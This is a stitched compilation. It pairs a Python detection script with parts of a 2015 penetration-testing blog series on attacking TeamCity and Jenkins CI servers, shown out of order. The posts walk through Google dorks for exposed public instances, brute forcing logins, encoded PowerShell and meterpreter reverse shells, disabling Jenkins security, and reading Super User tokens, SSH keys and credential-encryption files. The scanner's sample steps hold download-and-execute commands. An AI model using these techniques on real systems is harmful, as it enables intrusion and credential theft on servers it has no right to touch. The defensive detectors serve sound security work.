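    "in-memory execution": re.compile(r"(?i)\b(iex|Invoke-Expression)\b"),
    "TLS validation disabled": re.compile(
        r"(?i)ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}"),
    "token impersonation": re.compile(r"(?i)Invoke-TokenManipulation"),
    "CI security tampering": re.compile(
        r"(?i)cruise-config\.xml|Restart-Service\s+'?Go Server|credentials\.xml|teamcity-server\.log"),
}
# powershell -e / -ec / -enc / -EncodedCommand <base64>
ENCODED_RE = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; None if it is neither."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_step(command: str) -> dict:
    """Return the matched indicator names (sorted) and any decoded payload."""
    decoded = None
    m = ENCODED_RE.search(command)
    if m:
        decoded = decode_encoded_command(m.group(1))
    text = command if decoded is None else command + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"hits": hits, "decoded": decoded}


def encode_command(ps: str) -> str:
    """Build a -EncodedCommand argument; used only to construct the sample below."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed build steps. The first two reproduce commands from these posts;
# the third wraps the Go "Removing Security" commands in -EncodedCommand.
SAMPLE_STEPS = {
    "jenkins-batch": (
        "powershell -c \"iex(New-Object Net.WebClient).DownloadString("
        "'http://192.168.230.1/Invoke-TokenManipulation.ps1');"
        "Get-Process -Id 364 | Invoke-TokenManipulation -ImpersonateUser\""),
    "teamcity-powershell": (
        "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
        "iex (New-Object Net.WebClient).DownloadString(\"https://IPAddress:Port/connect\")"),
    "go-exec-encoded": "powershell -NoP -enc " + encode_command(
        "del 'C:\\Program Files (x86)\\Go Server\\config\\cruise-config.xml'; "
        "Restart-Service 'Go Server'"),
    "benign-build": "msbuild Solution.sln /p:Configuration=Release",
}


if __name__ == "__main__":
    for name, cmd in SAMPLE_STEPS.items():
        result = scan_step(cmd)
        print(name, "->", result["hits"] or "clean")
```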
<br />
Now, if we have the capability of configuring builds on the master, a few more interesting things can be done.<br />
<br />
<h4>
Super User</h4>
</div>
<div style="text-align: justify;">
TeamCity has a special user called Super User "which allows you to access the server UI with System Administrator permissions if you do not remember the credentials or need to fix authentication-related settings". Documentation about it is <a href="https://confluence.jetbrains.com/display/TCD9/Super+User">here</a>. To log in as a Super User we must have the Super User authentication token, which can be found in the teamcity-server.log file. In a default installation on Windows, the file is located in the C:\TeamCity\logs\ directory. The following simple PowerShell command could be used to read the token from a Windows master:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: white; color: black;">Select-String "Super User Authentication Token" C:\Teamcity\logs\teamcity-server.log</textarea></pre>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Hky7SqEk_LX2y8d7rtGYtJbzB-S7MVB1flPc8MMRc8p6ICZIaOel94xJreBdxPEsNf2ENhFykWoEVyTCkkCiWJNpWZqnKvO0i5LpCpTq0dF8tjSZvk9Xcv5TcTKeXxadH6x840UlchU/s1600/TeamCity_SuperUser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Hky7SqEk_LX2y8d7rtGYtJbzB-S7MVB1flPc8MMRc8p6ICZIaOel94xJreBdxPEsNf2ENhFykWoEVyTCkkCiWJNpWZqnKvO0i5LpCpTq0dF8tjSZvk9Xcv5TcTKeXxadH6x840UlchU/s400/TeamCity_SuperUser.png" width="400" /></a></div>
After getting the token, it could either be used with a blank username at the TeamCity login page or at [TeamCityUrl]/login.html?super=1. This is how a Super User login looks:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBREqYdXBowQifuR8OMtcW0b6X07p0YID1xaiCxTCuOmb8P7r0Y9DPZ7TTRAsEtWnPf1DHSrB8SsErbItNiWxiDxZFCzPJKf1KhQnDc5pO3ikF5SL4T41DaE1J3r9I2vviOFTMd3ssUnI/s1600/TeamCity_SuperUser_Login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBREqYdXBowQifuR8OMtcW0b6X07p0YID1xaiCxTCuOmb8P7r0Y9DPZ7TTRAsEtWnPf1DHSrB8SsErbItNiWxiDxZFCzPJKf1KhQnDc5pO3ikF5SL4T41DaE1J3r9I2vviOFTMd3ssUnI/s400/TeamCity_SuperUser_Login.png" width="400" /></a></div>
Great! Interestingly, a Super User token is regenerated only when the TeamCity Server service is restarted. Also, there can be any number of simultaneous Super User logins. It means that once you get access to a Super User token, it could provide reasonably long access to the TeamCity instance.<br />
<br />
Fun Fact: We can lock out the Super User for one minute by attempting to log in with a blank username and password on the TeamCity login page. Though I have not tried it, a Super User may be locked out for a longer duration by scripting the login attempts.<br />
<br />
<h4>
SSH Keys in clear</h4>
TeamCity allows users to upload SSH keys for projects. These keys, which are the private ones, are stored in clear on the master! Read the documentation <a href="https://confluence.jetbrains.com/display/TCD9/SSH+Keys+Management">here</a>. What's worse is that we can read the keys if we have the ability to configure builds on the master. The keys are stored in the [TeamCity Data Directory]\config\projects\[project]\pluginData\ssh_keys directory. We can get the Data Directory from the teamcity-server.log file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-6O9vveDcsybOnxS05C-aKgSO6y-rpScwjBR2JFkE43B_3TeafVZs-yybuhzpbnjB5RRvzNzKYLgcqCwdUEnBzp93qbGkcWEI42jDAw16xUTMNjxdHag77eW9_eg2m0Ij_p_o1S70xnM/s1600/TeamCity_SSH.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-6O9vveDcsybOnxS05C-aKgSO6y-rpScwjBR2JFkE43B_3TeafVZs-yybuhzpbnjB5RRvzNzKYLgcqCwdUEnBzp93qbGkcWEI42jDAw16xUTMNjxdHag77eW9_eg2m0Ij_p_o1S70xnM/s400/TeamCity_SSH.png" width="400" /></a></div>
Bingo! May I remind you that we are in 2015 :) <br />
<br />
<h4>
Google Dorks</h4>
Use the Google Dorks below to spot public instances of TeamCity:<br />
Instances with Guest login enabled: intitle:"Projects - TeamCity"<br />
Instances which allow Registration of new account: "intitle:Register a new account – TeamCity"<br />
<br />
TeamCity instances have very sensitive information. The screenshots below are just examples; there is a gold mine out there.<br />
<br />
In the screenshot below, the build log contained the URL of a product under development along with the credentials to access it with admin privileges.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibX4Z7ySZJ8gyLjKnqOnDxdFusEtJVKgPokI4Seo3nEq1ZFNV1rHamzUB99v8gKkLXL6FLxKGL4aBI5yJawZF6LOvwAilLFHtvX7qF6iiDFvkevkROAQLfTsufbtBUtWMF5ACian_TQys/s1600/TeamCity_BuildLog_Creds.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibX4Z7ySZJ8gyLjKnqOnDxdFusEtJVKgPokI4Seo3nEq1ZFNV1rHamzUB99v8gKkLXL6FLxKGL4aBI5yJawZF6LOvwAilLFHtvX7qF6iiDFvkevkROAQLfTsufbtBUtWMF5ACian_TQys/s400/TeamCity_BuildLog_Creds.png" width="400" /></a></div>
The one below had the password for the database administrator (sa) account. The public IP address of the database was visible in another build log. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUwX7ayyHbwHCRKaMFgWDLwVvUXt8LLsYUDr5EDpjtyH7pMJTD2C1lRQ3DNyrFAi0t_LfeeBEAywx3j5SAX5NOs5dehwb4NNFU2i4vTu_Mez9lrrLwLOdSOleWlxBUrEfantdNPllv04/s1600/TeamCity_BuildLog_SQLCreds.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUwX7ayyHbwHCRKaMFgWDLwVvUXt8LLsYUDr5EDpjtyH7pMJTD2C1lRQ3DNyrFAi0t_LfeeBEAywx3j5SAX5NOs5dehwb4NNFU2i4vTu_Mez9lrrLwLOdSOleWlxBUrEfantdNPllv04/s400/TeamCity_BuildLog_SQLCreds.png" width="400" /></a></div>
<br />
<h4>
Unserialization Vulnerability</h4>
As far as I know, TeamCity does not use the affected library.<br />
<br />
<h4>
Video Demonstration</h4>
A quick video demonstration of attacks discussed above:<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/8tfBA2HTFRg/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/8tfBA2HTFRg?feature=player_embedded" width="320"></iframe></div>
</div>
<br />
Hope you enjoyed the post! Feedback and comments are welcome :)<br />
<br />
To support my research, join me for the two-day training "<b>PowerShell for Penetration Testers</b>" at:<br />
<br />
<b>BlackHat, Asia (March 29-30th, 2016)</b> - https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html<br />
<br />
<b>HITB, Amsterdam (May 24-25th, 2016)</b> - http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/ <br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
<b>Week of Continuous Intrusion Tools - Day 1 - Jenkins</b> (Nikhil SamratAshok Mittal, published 2015-11-30, updated 2018-01-14)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Continuous Integration (CI) tools are used to frequently integrate commits by developers. Integration results in the execution of builds and tests. CI tools are used by development, build management and source code management teams of many software/code development organizations. Read more about it <a href="http://www.martinfowler.com/articles/continuousIntegration.html">here</a>.<br />
<br />
CI tools support distributed builds. That is, in a typical setup, a CI tool master server has the ability to execute commands on a good number of machines where a build slave or agent is running. A simplified typical industry setup for Continuous Integration looks like this:</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG96bfuwdTqmE3n7Gn3v7QGEP60VtZcsbIiqMGXAM77_KbWg0oVUTg0Lmt6fbPEC6IzIKDrYJ-VlIeGFXR86WacXGvo4tvFmZNYVPgUXq3YvvvkgPZktpXm2rmuyC8FVAQMfTVI1pcl-4/s1600/ContinuousIntegration.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG96bfuwdTqmE3n7Gn3v7QGEP60VtZcsbIiqMGXAM77_KbWg0oVUTg0Lmt6fbPEC6IzIKDrYJ-VlIeGFXR86WacXGvo4tvFmZNYVPgUXq3YvvvkgPZktpXm2rmuyC8FVAQMfTVI1pcl-4/s400/ContinuousIntegration.png" width="400" /></a></div>
<br />
I got interested in CI tools when, during a penetration test, I got access to one of the client's Jenkins instances available on the internet. It was trivial to compromise it and the access it provided amazed me. I blogged about it <a href="http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html">here</a>. <br />
<br />
As I began to actively look for and compromise CI servers, I realized that they are widely used, lack basic security controls and are often poorly configured, yet hold immense importance because of the information (code repositories, build logs, credentials etc.) and machines (distributed builds) they have access to. If a hacker manages to get access to a CI tool, it provides access to, at least, the source code and command execution on all the machines running slaves/agents.<br />
<br />
Still, what I found is an absolute disregard for the security of CI tools, both by their users and their developers. Even for instances on the internet, as we will see later on, many leave them running with default or improper configuration.<br />
<br />
To generate awareness about the security and attack surface of CI tools, I announce a <b>Week of Continuous Intrusion</b> beginning on 30th November, 2015. For the first three days we will discuss security issues in a CI tool (Jenkins and Hudson, TeamCity, Go and CruiseControl) and how its features and/or misconfigurations could be abused. On the fourth day, we will see a Common Abuse Set and how access to these tools could be used for lateral movement and post exploitation. On the fifth day, we will discuss defense and other things.<br />
<br />
All the code and other materials can be found here: <a href="https://github.com/samratashok/ContinuousIntrusion">https://github.com/samratashok/ContinuousIntrusion</a><br />
<br />
<div style="text-align: left;">
Day 1 - Jenkins (and Hudson)</div>
<div style="text-align: left;">
Day 2 - TeamCity (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-2.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 3 - Go and CruiseControl (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-3.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-4.html">Click Here</a>)</div>
<div style="text-align: justify;">
Day 5 - Defense and other discussion (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-5.html">Click Here</a>)</div>
<br />
I hope that this Week of Continuous Intrusion will help System Administrators and Blue Teams to understand the attack surface of CI tools and defend against attacks. I wish Penetration Testers and Red Teams will use this to break into networks, thus increasing the security of their clients. I also hope to see people doing more extensive research on the security of these tools. <br />
<br />
Let's begin with Day 1 - Jenkins.<br />
<br />
<h3>
Jenkins</h3>
Jenkins is the most widely used CI tool. You can download it from <a href="http://jenkins-ci.org/">here</a>. <a href="http://hudson-ci.org/">Hudson</a> has not been tested separately as both are quite similar. Whatever we are going to do with Jenkins should be applicable to Hudson as well. <br />
<br />
We can spot the following security issues in Jenkins: <br />
<ul>
<li>No authentication in the default installation.</li>
<li>No protection against brute force attacks.</li>
<li>No password complexity/policy for user passwords.</li>
<li>Runs as SYSTEM or a high-privilege user on Windows (I have never seen it running with non-admin privileges). </li>
<li>Prior to version 1.580, all users of Jenkins and console output of builds could be seen without authentication. Still, most Jenkins instances are configured the same way (Read privilege to Anonymous). </li>
</ul>
Documentation about securing Jenkins <a href="https://wiki.jenkins-ci.org/display/JENKINS/Securing+Jenkins">is here</a>. </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
For public instances of Jenkins, so much information can be collected that there may be no need to actually compromise them. The information in build outputs is scary! I have seen database credentials, Git credentials, SSH keys etc. More about this in the Google Dorks section below.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
After configuring the recommended Matrix Based Security, to be able to play with the operating system on which Jenkins is installed we must have access to a user who has privileges to Configure builds (a non-admin user). In most Jenkins instances, it is trivial to enumerate the users. Combine this with no protection against brute force attacks and no password policy and we can easily brute force user credentials. </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
User enumeration could be done by browsing to the following url (Anonymous with Read rights necessary): [JenkinsUrl]/asynchPeople/ </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
We can brute force Jenkins using Burp suite's Intruder or any similar tool. Catch a login request in Burp (POST request to [JenkinsUrl]/j_acegi_security_check) and send it to Intruder. Remember to remove the json parameter from the request. Also, we must go to Options and tell Intruder to follow redirections. </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
In my experience, CI tool users love to use their username as their password. Therefore, we first use the "pitchfork" attack type in Intruder to try the username as the password in the brute force requests. If that does not work, we use the "Cluster Bomb" attack type, with usernames as payload 1 and a password list as payload 2. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tAQYYJQgepjY5w-c0j_RiW00hH8I5mB2UGIz93-tjZf4w1NFUY13fvvseM_tim4xgWUKl88Up_vcBP3i4YK0TNi5l-Q7JqILTHW20YFAxzOnQPyPwZ97axyNcRkiyJOzurh2mLeYMkw/s1600/Jenkins_bruteForce.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tAQYYJQgepjY5w-c0j_RiW00hH8I5mB2UGIz93-tjZf4w1NFUY13fvvseM_tim4xgWUKl88Up_vcBP3i4YK0TNi5l-Q7JqILTHW20YFAxzOnQPyPwZ97axyNcRkiyJOzurh2mLeYMkw/s400/Jenkins_bruteForce.png" width="400" /></a></div>
<div style="text-align: justify;">
And this is what success looks like:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtsWGMNDm8-eWJuxNV1Ao7hSEDKs6yAu-WmhrQJYk7Fr4A127D4yloUoPOCgh6V5nV3ioZkgKb0JeiiL_kYgth3-jE0GDGOa6Jiaf2pPBYEBDwRS2JvCwaB-hV7opbo__uVjhj3iOuJhM/s1600/intruder.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtsWGMNDm8-eWJuxNV1Ao7hSEDKs6yAu-WmhrQJYk7Fr4A127D4yloUoPOCgh6V5nV3ioZkgKb0JeiiL_kYgth3-jE0GDGOa6Jiaf2pPBYEBDwRS2JvCwaB-hV7opbo__uVjhj3iOuJhM/s400/intruder.png" width="400" /></a></div>
<div style="text-align: justify;">
We can keep trying until we find a user with Configure rights for a project. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV4Nvl6xktU4yQd3vkekYu1OVpC2QT5sFcpGF_xfengvsYFS3liotBEfydou4aL391UpEogO_uAxztiv6035WK7XKhQjpqN73B5CEmva5_XkunA56IlDyWK919unmDmbcC6pAlYnyxIrk/s1600/configuser_dashboard.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV4Nvl6xktU4yQd3vkekYu1OVpC2QT5sFcpGF_xfengvsYFS3liotBEfydou4aL391UpEogO_uAxztiv6035WK7XKhQjpqN73B5CEmva5_XkunA56IlDyWK919unmDmbcC6pAlYnyxIrk/s400/configuser_dashboard.png" width="400" /></a></div>
<div style="text-align: justify;">
Good. With the ability to Configure builds we can do much fun stuff!</div>
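A defender-side counterpart to the user enumeration and brute force technique described above, as an added example that is not part of the original post: it parses reverse-proxy access logs and flags a source that lists users via /asynchPeople/ and then hammers /j_acegi_security_check. It assumes Jenkins sits behind a proxy writing combined-format logs and that a failed login shows up as a follow-up GET /loginError; the log lines are constructed.

```python
"""Spot credential brute forcing and user enumeration against Jenkins in
reverse-proxy access logs (added example, not code from the original post).

Assumes Jenkins sits behind a proxy writing Apache/nginx "combined" format
logs; every log line in this file is constructed for the demonstration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Endpoints named in the post: the login form target and the user listing.
LOGIN_PATH = "/j_acegi_security_check"
LOGIN_ERROR_PATH = "/loginError"   # Jenkins redirects here after a failed login
PEOPLE_PATH = "/asynchPeople/"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def detect(lines, max_failures=5, window_seconds=60):
    """Return findings as dicts with keys ip, kind, detail.

    "bruteforce": more than max_failures failed logins from one IP inside a
        sliding window of window_seconds. A failure is the GET /loginError the
        browser issues right after Jenkins answers the login POST with a redirect.
    "enumeration": an IP that listed users via /asynchPeople/ and then tried to log in.
    """
    findings = []
    failures = defaultdict(deque)   # ip -> timestamps of recent failed logins
    flagged_brute, flagged_enum, people_readers = set(), set(), set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method == "GET" and path == PEOPLE_PATH:
            people_readers.add(ip)
        elif method == "POST" and path == LOGIN_PATH:
            if ip in people_readers and ip not in flagged_enum:
                flagged_enum.add(ip)
                findings.append({"ip": ip, "kind": "enumeration",
                                 "detail": "listed users via /asynchPeople/ before attempting logins"})
        elif method == "GET" and path == LOGIN_ERROR_PATH:
            recent = failures[ip]
            recent.append(ts)
            while (ts - recent[0]).total_seconds() > window_seconds:   # drop stale failures
                recent.popleft()
            if len(recent) > max_failures and ip not in flagged_brute:
                flagged_brute.add(ip)
                findings.append({"ip": ip, "kind": "bruteforce",
                                 "detail": f"{len(recent)} failed logins within {window_seconds}s"})
    return findings


def _line(ip, hhmmss, method, path, status):
    """Build one constructed combined-format log line."""
    return (f'{ip} - - [30/Nov/2015:{hhmmss} +0530] "{method} {path} HTTP/1.1" '
            f'{status} 512 "-" "Mozilla/5.0"')


# Constructed traffic: a user who mistypes once and then logs in, followed by a
# source that lists users and fires eight guesses in 24 seconds.
SAMPLE_LOG = [
    _line("198.51.100.20", "19:15:01", "POST", LOGIN_PATH, 302),
    _line("198.51.100.20", "19:15:01", "GET", LOGIN_ERROR_PATH, 200),
    _line("198.51.100.20", "19:15:09", "POST", LOGIN_PATH, 302),
    _line("198.51.100.20", "19:15:09", "GET", "/", 200),
    _line("203.0.113.7", "19:16:00", "GET", PEOPLE_PATH, 200),
]
for _i in range(8):
    _stamp = f"19:16:{10 + 3 * _i:02d}"
    SAMPLE_LOG.append(_line("203.0.113.7", _stamp, "POST", LOGIN_PATH, 302))
    SAMPLE_LOG.append(_line("203.0.113.7", _stamp, "GET", LOGIN_ERROR_PATH, 200))

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(f"{finding['ip']}: {finding['kind']} - {finding['detail']}")
```

The same per-source counters are what a fail2ban-style rule needs, which is the brute force protection the post says Jenkins lacks.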
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<h3>
Executing Commands</h3>
With the privileges to configure builds, we can add/edit "Build Steps" of a project. Build steps provide various options like executing batch or shell commands (or even more depending on the installed plugins). Let's try it out!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgchW2pVNZcsgCUOeYq0tiHqzjyvCM2-oQh1N6GFgs9UVausVVKVHZcKPuGM5X959B1Wksgr2918WLt74M0eKLoyHQ1Ksz_OZLnTiw54Hr4-OruOCjZac1GcO0DkTr8z89Kyh9pgn7mkfI/s1600/Jenkins_whoami.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgchW2pVNZcsgCUOeYq0tiHqzjyvCM2-oQh1N6GFgs9UVausVVKVHZcKPuGM5X959B1Wksgr2918WLt74M0eKLoyHQ1Ksz_OZLnTiw54Hr4-OruOCjZac1GcO0DkTr8z89Kyh9pgn7mkfI/s400/Jenkins_whoami.png" width="400" /></a></div>
Bingo! We have command execution with SYSTEM privileges on a Windows slave node. Note that this is a feature of Jenkins and not a vulnerability. <br />
<br />
I advocate using PowerShell wherever we can to improve the existing techniques of penetration testing. In the current scenario, we can move from this simple command execution to a reverse shell by using PowerShell. There is no need to drop a binary or any other tool for that. Let's use <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1">Invoke-PowerShellTcpOneLine.ps1 from Nishang</a>. The script contains two one-line shells; we only need one of them, so remove the other line of code from the script. To execute it from memory, we must encode it using Invoke-Encode from Nishang with the -OutCommand parameter.<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\nishang> . .\Utility\Invoke-Encode.ps1
PS C:\nishang> Invoke-Encode -DataToEncode .\Shells\Invoke-PowerShellTcpOneLine.ps1 -OutCommand</textarea></pre>
Now the generated encoded script from "encodedcommand.txt" file could be used with PowerShell's -encodedcommand parameter to execute the script without touching disk.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6EMJE6gv_j3oKDTqEZ4PvqKH6o7znhZvvt9SldBMIq68eQw_Qd2DpPHrnR76_nF-Gute0I_cW7X6mHTHuu2GJ2oLlxHeIV0QYaNQlWAjE-4HKBISp7aEvUYISIDuHT9kewfY0n4SDl8U/s1600/Jenkins_reverseshell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6EMJE6gv_j3oKDTqEZ4PvqKH6o7znhZvvt9SldBMIq68eQw_Qd2DpPHrnR76_nF-Gute0I_cW7X6mHTHuu2GJ2oLlxHeIV0QYaNQlWAjE-4HKBISp7aEvUYISIDuHT9kewfY0n4SDl8U/s400/Jenkins_reverseshell.png" width="400" /></a></div>
Great! An in-memory reverse shell with SYSTEM privileges! There is a reason why we use PowerShell :)<br />
<br />
For Metasploit fans (like me), we can also get a reverse meterpreter by abusing this functionality. We must generate a payload using "./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=[IPAddress] -f psh-cmd". The generated payload can then be used like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlGiq6CR64Cc-Lg87eBJLRQCIHv0zyN2Ck_TjeTmOY7sR9g0emv8HguQ3pkBPJi7tFfbTaOgYnEVbgwYeTJnPjtc_E9nveD6HEho20mlMImWGvHlPjHXFF4m9yIKh5Tb5L-GSW6YYoZKk/s1600/Jenkins_meterpreter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlGiq6CR64Cc-Lg87eBJLRQCIHv0zyN2Ck_TjeTmOY7sR9g0emv8HguQ3pkBPJi7tFfbTaOgYnEVbgwYeTJnPjtc_E9nveD6HEho20mlMImWGvHlPjHXFF4m9yIKh5Tb5L-GSW6YYoZKk/s400/Jenkins_meterpreter.png" width="400" /></a></div>
Awesome, isn't it?<br />
<br />
Note that we executed the commands by utilizing the ability to configure builds on a slave. Projects can be configured to use the executor on master as well. If we have the ability to configure builds on master, a couple more interesting attacks can be executed. <br />
<br />
<h4>
Removing Security</h4>
If we can configure builds on master, we can remove all the security for the Jenkins server. See <a href="https://wiki.jenkins-ci.org/display/JENKINS/Disable+security">this</a>. We just need to remove/rename or edit config.xml from the $JENKINS_HOME/config directory and restart the Jenkins service. If editing, we just need to replace [useSecurity]true[/useSecurity] with [useSecurity]false[/useSecurity] in config.xml (in case Realm and authorization . For Windows, we can use the PowerShell command below to edit config.xml:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: white; color: black;">powershell "(cat C:\test\config.xml) -replace '<useSecurity>true</useSecurity>','<useSecurity>false</useSecurity>' | Set-Content C:\test\config.xml"</textarea></pre>
<br />
To know $JENKINS_HOME, see the build logs for any project on master. <br />
<br />
Running it as a build step on master, followed by a service restart, will remove all security from the web console and anyone browsing to the URL will have admin rights. During my tests, I was unable to restart the Jenkins service using PowerShell's Restart-Service or sc.exe on Windows. It was only from a meterpreter session that the service could be restarted. On *nix, it may not be possible to restart the Jenkins service without root.<br />
<br />
<h4>
Decrypt Credentials</h4>
It is possible to retrieve credentials stored by Jenkins in clear text. These include passwords, passphrases, SSH keys (including private keys) and more which are saved using the Manage Credentials section by an admin user. By abusing the ability to configure builds on master we can read and decrypt the credentials. A thorough blog post, from which I stole the technique, is this: <a href="http://thiébaud.fr/jenkins_credentials.html">http://thiébaud.fr/jenkins_credentials.html</a><br />
<br />
We need three pieces of information from Jenkins master:<br />
<ol>
<li>credentials.xml from the $JENKINS_HOME directory which contains the encrypted passwords.</li>
<li>hudson.util.secret from the $JENKINS_HOME\secrets directory which encrypts the passwords.</li>
<li>master.key from the $JENKINS_HOME\secrets directory which encrypts hudson.util.secret.</li>
</ol>
On a Windows master, the PowerShell commands below can be used to read these files. Note that we read hudson.util.secret and master.key as bytes to preserve their format.<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: white; color: black;">powershell -c "cat 'C:\Program Files (x86)\Jenkins\credentials.xml'"
powershell -c "cat -encoding byte 'C:\Program Files (x86)\Jenkins\secrets\master.key'"
powershell -c "cat -encoding byte -path 'C:\Program Files (x86)\Jenkins\secrets\hudson.util.Secret'"</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKwVTaGpjkh82vgk31I9l_C6mHQ-S02FDSpQiItlYXMasobk-XPW4AZ2KMICMdfOjDGSARPeXSl1-F4nzxLE0Gz5yQPm3OMDejgfHd3fFlOM9gHfHyZvzAULcZ5Zem3F-XF5F23FRv2g8/s1600/jenkins_decrypt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKwVTaGpjkh82vgk31I9l_C6mHQ-S02FDSpQiItlYXMasobk-XPW4AZ2KMICMdfOjDGSARPeXSl1-F4nzxLE0Gz5yQPm3OMDejgfHd3fFlOM9gHfHyZvzAULcZ5Zem3F-XF5F23FRv2g8/s400/jenkins_decrypt.png" width="400" /></a></div>
